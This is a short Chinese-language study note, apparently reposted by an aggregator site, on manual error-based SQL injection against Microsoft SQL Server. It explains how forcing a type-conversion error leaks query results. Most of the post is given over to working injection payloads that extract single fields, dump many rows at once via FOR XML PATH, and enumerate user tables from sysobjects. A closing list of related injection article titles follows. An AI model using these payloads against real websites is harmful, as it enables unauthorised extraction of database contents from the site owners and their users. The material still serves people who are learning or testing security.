学习笔记 MSSQL显错手工注入

Posted 烤红薯咖啡馆

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了学习笔记 MSSQL显错手工注入相关的知识,希望对你有一定的参考价值。

和朋友一起学习,速度就是快。感谢珍惜少年时

网上很多都在长篇大论MSSQL显错手工注入,其实原理只有一小段。如下:

\' and (查询一段内容)=1 and \'C\'=\'C
nvarchar类型(查询一段内容的返回) 会自动转换int类型 ,肯定会转换失败。然后报错将nvarchar类型(查询一段内容的返回) 的值显示出来。

由这个原理衍生出单字段查询。如下:

\' and 0=(SELECT top 1 username FROM table) and \'C\'=\'C

然后有衍生出多字段查询。如下:

\' and 0=(SELECT top 100 username FROM table FOR XML PATH(\'\')) and \'C\'=\'C

最后根据MSSQL内置表特性和函数,写出如下:

\' and 1=(select quotename(name) from 数据库名称..sysobjects where xtype=\'U\' FOR XML PATH(\'\')) and \'C\'=\'C

如果SQL语句看不懂,请百度。

 

如果有问题欢迎纠正。

以上是关于学习笔记 MSSQL显错手工注入的主要内容,如果未能解决你的问题,请参考以下文章

MSSQL注入-显错注入及反弹注入

SQL注入笔记

MSSQL注入SA权限不显错模式下的入侵

SQL注入之mysql显错注入

如何学习网络安全?手把手带你跟着B站一起学——第四节:显错注入

NSATP-A学习笔记之Day3-2注入原理